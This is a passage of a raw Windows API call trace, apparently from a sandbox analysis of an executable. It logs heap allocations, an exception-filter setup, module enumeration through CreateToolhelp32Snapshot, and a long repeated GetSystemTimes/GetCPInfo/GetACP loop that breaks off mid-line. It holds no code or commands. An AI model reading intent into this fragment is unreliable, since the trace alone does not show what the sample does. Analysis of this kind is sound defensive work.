Flags=0x8, Size=0x18) returned 0x2f1ce0 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1d00 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe) returned 0x2f1d20 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x69) returned 0x2f1d38 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3e) returned 0x2f1db0 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1b) returned 0x2f1df8 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1d) returned 0x2f1e20 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x48) returned 0x2f1e48 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x2f1e98 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f1eb8 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1b) returned 0x2f1ed8 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f1f00 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x29) returned 0x2f1f30 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x2f1f68 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x41) returned 0x2f1f90 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1fe8 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xf) returned 0x2f2008 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x16) returned 0x2f2020 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x2f2040 [0080.183] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x29) returned 0x2f2078 [0080.183] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x15) returned 0x2f20b0 [0080.183] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1e) returned 0x2f20d0 [0080.183] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2a) returned 0x2f20f8 [0080.183] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x2f2130 [0080.183] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x18) returned 0x2f2150 [0080.183] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x46) returned 0x2f2170 [0080.183] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f11f8 | out: hHeap=0x2f0000) returned 1 [0080.184] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f21c0 [0080.184] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x80) returned 0x2f11f8 [0080.184] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0080.185] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f11f8) returned 0x80 [0080.185] GetLastError () returned 0x0 [0080.185] SetLastError (dwErrCode=0x0) [0080.185] GetLastError () returned 0x0 [0080.185] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.186] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.186] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.186] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.186] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.186] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.186] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.186] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.186] SetLastError (dwErrCode=0x0) [0080.186] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.187] SetLastError (dwErrCode=0x0) [0080.187] GetLastError () returned 0x0 [0080.188] SetLastError (dwErrCode=0x0) [0080.188] GetLastError () returned 0x0 [0080.188] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0080.188] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0080.188] GetProcAddress (hModule=0x76e10000, lpProcName="Module32FirstW") returned 0x76e479f9 [0080.188] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0080.193] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0080.193] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0080.193] GetTickCount () returned 0x115a45b [0080.193] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.194] GetACP () returned 0x4e4 [0080.194] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.194] GetACP () returned 0x4e4 [0080.194] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.194] GetACP () returned 0x4e4 [0080.194] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.194] GetACP () returned 0x4e4 [0080.194] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.194] GetACP () returned 0x4e4 [0080.194] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.194] GetACP () returned 0x4e4 [0080.194] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.194] GetACP () returned 0x4e4 [0080.194] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.194] GetACP () returned 0x4e4 [0080.194] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.194] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.195] GetACP () returned 0x4e4 [0080.195] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.195] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.195] GetACP () returned 0x4e4 [0080.195] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.195] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.195] GetACP () returned 0x4e4 [0080.195] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.195] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.195] GetACP () returned 0x4e4 [0080.195] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.195] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.195] GetACP () returned 0x4e4 [0080.195] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.195] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.195] GetACP () returned 0x4e4 [0080.195] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.195] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.195] GetACP () returned 0x4e4 [0080.195] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.195] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.195] GetACP () returned 0x4e4 [0080.195] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.195] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.196] GetACP () returned 0x4e4 [0080.196] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.196] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.196] GetACP () returned 0x4e4 [0080.196] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.196] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.196] GetACP () returned 0x4e4 [0080.196] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.196] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.196] GetACP () returned 0x4e4 [0080.196] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.196] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.196] GetACP () returned 0x4e4 [0080.196] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.196] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.196] GetACP () returned 0x4e4 [0080.196] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.196] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.196] GetACP () returned 0x4e4 [0080.196] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.197] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.197] GetACP () returned 0x4e4 [0080.197] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.197] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.197] GetACP () returned 0x4e4 [0080.197] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.197] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.197] GetACP () returned 0x4e4 [0080.197] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.197] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.197] GetACP () returned 0x4e4 [0080.197] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.197] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.197] GetACP () returned 0x4e4 [0080.197] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.197] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.197] GetACP () returned 0x4e4 [0080.197] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.197] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.197] GetACP () returned 0x4e4 [0080.197] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.198] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.198] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.198] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.198] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.198] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.198] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.198] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.198] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.198] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.198] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.199] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.199] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.199] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.199] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.199] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.199] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.199] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.199] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.199] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.199] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.199] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.199] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.199] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.199] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.199] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.199] GetACP () returned 0x4e4 [0080.199] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.200] GetACP () returned 0x4e4 [0080.200] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.200] GetACP () returned 0x4e4 [0080.200] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.200] GetACP () returned 0x4e4 [0080.200] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.200] GetACP () returned 0x4e4 [0080.200] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.200] GetACP () returned 0x4e4 [0080.200] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.200] GetACP () returned 0x4e4 [0080.200] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.200] GetACP () returned 0x4e4 [0080.200] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.200] GetACP () returned 0x4e4 [0080.200] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.200] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.201] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.201] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.201] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.201] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0080.201] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0080.201] GetACP () returned 0x4e4 [0080.201] GetSystemTimes (in: lpIdleTime=0x18fa70, 